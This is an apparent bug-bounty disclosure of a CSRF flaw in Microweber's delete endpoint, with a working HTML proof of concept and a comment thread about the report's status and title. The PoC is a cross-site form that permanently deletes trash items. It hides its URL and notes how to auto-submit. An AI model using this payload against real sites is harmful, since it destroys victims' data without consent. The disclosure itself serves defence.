Cross-Site Request Forgery (CSRF) in microweber/microweber
Reported on
Aug 9th 2021
✍️ Description
An attacker who knows the id values of the files sitting in the trash can have them deleted permanently through a CSRF attack: the delete endpoint is reachable with a cross-site form POST and relies only on the victim's session cookie, so a logged-in admin who visits an attacker-controlled page triggers the deletion without any further interaction.
🕵️♂️ Proof of Concept
Open PoC.html in Firefox or Safari while logged in as admin and click the submit button (the form can also be auto-submitted); afterwards the files with ids 18, 19 and 20 have been deleted. Chromium-based browsers default cookies with no SameSite attribute to Lax, so there the cross-site POST will normally not carry the session cookie.
<!-- PoC.html: cross-site form that posts to the delete endpoint.
     The victim's browser attaches the admin session cookie on its own. -->
<html>
<body>
<!-- Rewrites the address bar to "/" so the page looks harmless to the victim. -->
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
<!-- ids[] selects the trash items; forever=true makes the delete permanent. -->
<input type="hidden" name="ids[]" value="18" />
<input type="hidden" name="ids[]" value="19" />
<input type="hidden" name="ids[]" value="20" />
<input type="hidden" name="forever" value="true" />
<!-- To auto-submit, replace the button with <script>document.forms[0].submit()</script>. -->
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
Every file in the trash whose id the attacker supplies is deleted permanently, with no way to recover it; the only precondition is that the victim is logged in as admin when visiting the attacker's page.
📍 Location
app.js#L1
Occurrences
This issue needs the user to be logged in as admin.
Yeah, the main point of any CSRF attack is that the user must be logged in beforehand. Excuse me for my bad explanation, but this is CSRF, and a CWE has already been assigned to it.
CSRF attacks mean that first the user/admin should be logged into your application, then just goes to a malicious website, and after that, only by visiting that site, the attacker can delete a batch of users.
You can set the Strict value on the SameSite attribute of just one of your cookies, and then nobody will be able to perform any CSRF attacks.
@admin, can you change the status of this report like before?
@amammad - I have updated the status of the report.
@maintainer - feel free to mark as valid if you see fit.
Yeah, you're welcome, dear Peter. Can you validate the other CSRFs too?
@admin Hey man, I made a foolish mistake and reported a vulnerability with the wrong title.
Can you change the title to CSRF? With regards.